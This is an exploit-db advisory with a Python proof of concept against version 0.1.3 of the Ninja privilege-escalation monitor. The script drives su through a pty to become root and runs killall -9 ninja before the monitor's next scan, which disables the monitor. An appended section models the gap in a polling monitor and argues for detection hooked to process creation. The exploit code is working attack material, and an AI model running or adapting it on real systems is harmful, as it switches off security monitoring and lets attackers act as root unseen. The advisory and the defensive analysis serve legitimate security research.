Ninja Privilege Escalation Detection and Prevention System 0.1.3 – Race Condition Privilege Escalation

  • Author: Ben Sheppard
    Date: 2015-04-29
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/36855/
#[Title] Ninja privilege escalation detection and prevention system race condition
#[Author] Ben 'highjack' Sheppard
#[URL] http://highjack.github.io/
#[Description] There is a small delay between the time of execution of a command and the time privilege escalation is detected.
#It is therefore possible to use a pty to run a command such as su and provide the password faster than it can be detected.
#The following PoC becomes root using su and issues killall -9 ninja. The attacker can then run any commands that they wish.
#[Software Link] http://forkbomb.org/ninja/
#[Date] 29/04/2015
#[Version] 0.1.3
#[Tested on] Kali Linux
#[Demo] https://www.youtube.com/watch?v=P8VJCUUJPLg

#See me hitting every open port, 'cause I'm banging on their system while I'm staying out of the court
#https://www.youtube.com/watch?v=eA136fOsSeQ

import os
import pty
import subprocess
import sys

#begin config
user = "root"
password = "mypassword" #change this :)
command = "killall -9 ninja"
#end config


def usage():
    print("""
@@@@@@@@@ @@@@@@@@@@@@@@ @@@ @@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@
@@!@@@@@!!@@@@!@@@ @@!@@!@@@!@@ @@!!@@
!@!@!@!@!!@!!@!@!@ !@!!@!@!@!@! !@!@!!
@!@!@!@!!!@!@! @!@!@@!@!@!@! !!@@!@!@!@!!@! @!@@!@!
!!!@!!!!!!!!!! !!@!!!!!@!!!! !!!!!!@!!!!!!! !!@!!!
!!:!!!!!::!! !!:!!:!!! !!:!!:!!!:!! !!: :!!
:!:!:!:!::!: !:::!:!:!!!::!::!:!:!:!: :!:!:!
:: ::: :: ::: :::::: :::::: : :::: ::: ::: ::: :::::
 : : :: :: :: :: : : : ::: : : : :: :: : : :::

[Title] Ninja privilege escalation detection and prevention system 0.1.3 race condition
[Author] Ben 'highjack' Sheppard
[URL] http://highjack.github.io/

[Description] There is a small delay between the time of execution of a command and the time privilege escalation is detected.
It is therefore possible to use a pty to run a command such as su and provide the password faster than it can be detected.
The following PoC becomes root using su and issues killall -9 ninja. The attacker can then run any commands that they wish.
""")


def check_procs():
    # Equivalent of: ps aux | grep root | grep /sbin/ninja
    # True while a root-owned ninja is still in the process table.
    ps = subprocess.run(["ps", "aux"], stdout=subprocess.PIPE, check=False)
    for line in ps.stdout.decode(errors="replace").splitlines():
        if "root" in line and "/sbin/ninja" in line:
            return True
    return False


def kill_ninja():
    # su reads the password from the controlling terminal, not from stdin,
    # so the child has to run inside a pty. The password is written the
    # moment the prompt shows up and the command runs straight away, so the
    # whole su -> killall sequence completes before ninja's next check.
    # A fresh pty is forked per attempt so the function can be retried.
    pid, fd = pty.fork()
    if pid == 0:
        os.execvp("su", ["su", user, "-c", command])  # never returns on success
        os._exit(127)
    try:
        os.read(fd, 1024)                         # "Password:" prompt
        os.write(fd, (password + "\n").encode())
        os.read(fd, 1024)                         # drain whatever su/killall print
    except OSError:
        pass                                      # child already exited (EIO on the master side)
    os.waitpid(pid, 0)
    os.close(fd)


if __name__ == "__main__":
    executions = 0
    while True:
        kill_ninja()
        if not check_procs():
            usage()
            print("[+] Ninja is terminated")
            sys.exit(0)
        # ninja survived this attempt (it won the race): retry once, then give up
        executions += 1
        if executions > 1:
            print("[-] Ninja is still running, giving up")
            sys.exit(1)
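The description above rests on one fact: a monitor that rescans the process table on a timer cannot see a process that starts and exits between two scans, so the attacker only has to finish su and killall inside one scan period. The model below is an added example, not code from the PoC or from Ninja itself; it replays a constructed process timeline against a periodic scanner and against an event-driven monitor, and gives the closed-form check for whether a process of a given lifetime can fall into the gap. The scan period, pids, command names and timings are assumed values.

```python
"""Model of the race window in a polling privilege-escalation monitor.

Added illustration, not code from the PoC above or from Ninja. A Ninja-style
tool rescans the process table periodically and kills root processes whose
parent is not on its allowlist, so a process that starts and exits between two
scans is never observed. Scan period, pids and timings below are assumed.
"""
import math
from dataclasses import dataclass
from typing import Iterable, List, Tuple


@dataclass(frozen=True)
class Proc:
    pid: int
    uid: int
    comm: str
    start: float  # seconds: first instant the process is in the table
    end: float    # seconds: exit instant (exclusive)


def snapshot(procs: Iterable[Proc], t: float) -> List[Proc]:
    """Process table as a scanner reading /proc at instant t would see it."""
    return [p for p in procs if p.start <= t < p.end]


def polling_monitor(procs: Iterable[Proc], interval: float, horizon: float,
                    allowlist: Tuple[int, ...] = ()) -> List[Tuple[float, int]]:
    """Scan every `interval` seconds up to `horizon`; return (time, pid) for
    every unauthorised uid-0 process present at a scan instant."""
    hits = []
    for i in range(int(horizon / interval) + 1):
        t = i * interval
        for p in snapshot(procs, t):
            if p.uid == 0 and p.pid not in allowlist:
                hits.append((t, p.pid))
    return hits


def event_monitor(procs: Iterable[Proc],
                  allowlist: Tuple[int, ...] = ()) -> List[Tuple[float, int]]:
    """Monitor notified at every process start (what a netlink proc-connector
    or audit-based detector receives): lifetime no longer matters."""
    return sorted((p.start, p.pid) for p in procs
                  if p.uid == 0 and p.pid not in allowlist)


def fits_between_scans(p: Proc, interval: float) -> bool:
    """True if no scan instant k*interval falls inside [p.start, p.end)."""
    next_scan = math.ceil(p.start / interval) * interval
    return next_scan >= p.end


def undetected(procs: Iterable[Proc], interval: float, horizon: float,
               allowlist: Tuple[int, ...] = ()) -> List[int]:
    """Unauthorised root pids the polling monitor never saw."""
    seen = {pid for _, pid in polling_monitor(procs, interval, horizon, allowlist)}
    return [p.pid for p in procs
            if p.uid == 0 and p.pid not in allowlist and p.pid not in seen]


# Constructed timeline (seconds). pid 1 stands in for the allow-listed system.
TIMELINE = (
    Proc(1, 0, "init", 0.0, 10.0),
    Proc(4242, 1000, "python3", 0.0, 10.0),   # the unprivileged driver script
    Proc(4243, 0, "su", 0.30, 0.55),          # su becomes root ...
    Proc(4244, 0, "killall", 0.40, 0.55),     # ... and its command runs, all in 250 ms
    Proc(4250, 0, "bash", 2.30, 10.0),        # a root shell left open after the race
)
INTERVAL = 1.0   # assumed scan period of the monitor
HORIZON = 10.0
ALLOW = (1,)


if __name__ == "__main__":
    seen = sorted({pid for _, pid in polling_monitor(TIMELINE, INTERVAL, HORIZON, ALLOW)})
    print("polling monitor saw   :", seen)
    print("polling monitor missed:", undetected(TIMELINE, INTERVAL, HORIZON, ALLOW))
    print("event monitor saw     :", [pid for _, pid in event_monitor(TIMELINE, ALLOW)])
    for p in TIMELINE:
        if p.uid == 0 and p.pid not in ALLOW:
            print(f"  pid {p.pid} ({p.comm}) lifetime {p.end - p.start:.2f}s "
                  f"fits between scans: {fits_between_scans(p, INTERVAL)}")
```

With a one-second scan the su and killall processes are never observed, while the lingering root shell is caught on the first scan after it appears; shortening the period to 250 ms catches all three in this timeline, but any period is still a guaranteed blind spot for processes shorter than it. The event-driven monitor reports every root process at the instant it starts, which is why detection of this class should hook process creation (proc connector, audit, or similar) rather than poll the process table.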